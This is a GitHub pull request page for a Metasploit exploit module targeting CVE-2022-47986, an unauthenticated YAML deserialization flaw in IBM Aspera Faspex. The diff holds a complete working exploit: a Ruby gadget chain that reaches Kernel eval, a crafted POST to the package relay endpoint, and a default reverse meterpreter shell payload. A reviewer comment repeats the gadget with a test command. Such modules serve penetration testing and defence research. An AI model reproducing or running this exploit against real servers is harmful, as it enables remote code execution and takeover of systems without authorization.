Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[exploit][RCE][CVE-2022-47986] IBM aspera faspex YAML deserialization #17760

Closed
wants to merge 23 commits into from
Closed

[exploit][RCE][CVE-2022-47986] IBM aspera faspex YAML deserialization #17760

Changes from all commits
Commits
Show all changes
23 commits
Select commit Hold shift + click to select a range
7b777a8
[exploit][RCE][CVE-2022-47986] IBM aspera faspex YAML deserialization
mauricelambert Mar 9, 2023
5a5ac57
Fix: exploit is a JSON string
mauricelambert Mar 9, 2023
50ca746
Fix: syntax error
mauricelambert Mar 10, 2023
91a834f
Fix: not implemented method
mauricelambert Mar 10, 2023
4382277
Fix: Payload JSON syntax
mauricelambert Mar 10, 2023
de886f2
Fix: JSON syntax
mauricelambert Mar 10, 2023
ab0ad19
Linting
mauricelambert Mar 10, 2023
4b978b6
Remove unused function
mauricelambert Mar 16, 2023
23add71
Payload random values
mauricelambert Mar 17, 2023
82749ac
Forgotten random value
mauricelambert Mar 17, 2023
4b87070
Payload random value
mauricelambert Mar 17, 2023
918cddb
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert Apr 28, 2023
a26d38c
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert Apr 28, 2023
830905a
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert Apr 28, 2023
4e8236d
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert Apr 28, 2023
0afbe40
Fix: random UUID in the payload
mauricelambert Apr 28, 2023
ed9a98e
Fix: replace uuid string
mauricelambert Apr 28, 2023
d9fa3de
Use string interpolation
mauricelambert Apr 28, 2023
d05fcc0
Use metasploit command stagers instead of custom payload
mauricelambert Apr 28, 2023
d53994f
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert Apr 28, 2023
65f78ca
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert May 22, 2023
6471007
Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deseria…
mauricelambert May 22, 2023
a336652
Minor fixes including payload encoding
jheysel-r7 Jul 14, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
134 changes: 134 additions & 0 deletions modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,134 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'IBM Aspera Faspex YAML deserialization vulnerability',
'Description' => %q{
This module exploits an unauthenticated YAML deserialization vulnerability
which exists in IBM Aspera Faspex version 4.4.2 Patch Level 1 and below (CVE-2022-47986).
},
'References' => [
['CVE', '2022-47986'],
['URL', 'https://www.ibm.com/support/pages/node/6952319'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-47986'],
['URL', 'https://github.com/ohnonoyesyes/CVE-2022-47986/blob/main/poc.py'],
['URL', 'https://thehackernews.com/2023/03/icefire-linux-ransomware.html'],
['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis'],
],
'Author' => [
'ohnonoyesyes', # POC
'Maurice LAMBERT', # Metasploit auxiliary module
],
'DisclosureDate' => '2023-02-02',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',
'RPORT' => 9000
}
}
],
],
'CmdStagerFlavor' => [ 'echo' ],
'Payload' => { 'BadChars' => '`' },
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options(
[OptString.new('TARGETURI', [ false, 'The base path for the IBM Aspera Faspex Application.', '/aspera/faspex'])]
)
end

def execute_command(command, _opts = {})
exploit = <<~EOT
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "pew"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:PrettyPrint
output: !ruby/object:Net::WriteAdapter
socket: &1 !ruby/module "Kernel"
method_id: :eval
newline: "throw `#{command}`"
buffer: {}
group_stack:
- !ruby/object:PrettyPrint::Group
break: true
method_id: :breakable
EOT
uuid = SecureRandom.uuid

payload = {
"package_file_list[]": '/',
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This was my doing and seems like a bit of a hack. When defining package_file_list like so:
package_file_list: ["/"] the fact that its defined as an array seems to be ignored by URI.encode_www_form and I was getting an error from the application as it expected package_file_list to be an array. I've included an example below.

irb example 

3.0.0 :003 > hash = {
3.0.0 :004 >   "package_file_list" => ["/"],  # Encapsulate the value in an array
3.0.0 :005 >   "external_emails" => "---\n- !ruby/object:Gem::Installer\n    i: x\n- !ruby/object:Gem::SpecFetcher\n    i: y\n- !ruby/object:Gem::Requirement\n  requirements:\n
  !ruby/object:Gem::Package::TarReader\n    io: &1 !ruby/object:Net::BufferedIO\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\n         read: 0\n         header: \"pe
w\"\n      debug_output: &1 !ruby/object:Net::WriteAdapter\n         socket: &1 !ruby/object:PrettyPrint\n             output: !ruby/object:Net::WriteAdapter\n                 so
cket: &1 !ruby/module \"Kernel\"\n                 method_id: :eval\n             newline: \"throw `touch /tmp/foobar`\"\n             buffer: {}\n             group_stack:\n
          - !ruby/object:PrettyPrint::Group\n                break: true\n         method_id: :breakable\n",
3.0.0 :006 >   "package_name" => "assetnote_pack",
3.0.0 :007 >   "package_note" => "hello from assetnote team",
3.0.0 :008 >   "original_sender_name" => "assetnote",
3.0.0 :009 >   "package_uuid" => "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
3.0.0 :010 >   "metadata_human_readable" => "Yes",
3.0.0 :011 >   "forward" => "pew",
3.0.0 :012 >   "metadata_json" => "{}",
3.0.0 :013 >   "delivery_uuid" => "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
3.0.0 :014 >   "delivery_sender_name" => "assetnote",
3.0.0 :015 >   "delivery_title" => "TEST",
3.0.0 :016 >   "delivery_note" => "TEST",
3.0.0 :017 >   "delete_after_download" => true,
3.0.0 :018 >   "delete_after_download_condition" => "IDK"
3.0.0 :019 > }
 =>
{"package_file_list"=>["/"],
...
3.0.0 :020 >
3.0.0 :021 > encoded_params = URI.encode_www_form(hash)
 => "package_file_list=%2F&external_emails=---%0A-+%21ruby%2Fobject%3AGem%3A%3AInstaller%0A++++i%3A+x%0A-+%21ruby%2Fobject%3AGem%3A%3ASpecFetcher%0A++++i%3A+y%0A-+%21ruby%2...
3.0.0 :022 >

This satisfied the server as it expects package_file_list%5B%5D=%2F not what is generated above.

external_emails: exploit,
package_name: 'assetnote_pack',
package_note: Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15).to_s,
original_sender_name: Rex::Text.rand_name.to_s,
package_uuid: uuid.to_s,
metadata_human_readable: 'Yes',
forward: 'pew',
metadata_json: '{}',
delivery_uuid: uuid.to_s,
delivery_sender_name: Rex::Text.rand_name.to_s,
delivery_title: Rex::Text.rand_text_alphanumeric(4).to_s,
delivery_note: Rex::Text.rand_text_alphanumeric(12).to_s,
delete_after_download: true,
delete_after_download_condition: 'IDK'
}

response = send_request_raw({
'method' => 'POST',
'uri' => normalize_uri(datastore['TARGETURI'], '/package_relay/relay_package'),
'data' => URI.encode_www_form(payload)
})
if response && response.body
return response.body
end

false
end

def exploit
print_status('Exploiting...')
execute_command(payload.encoded)
end
end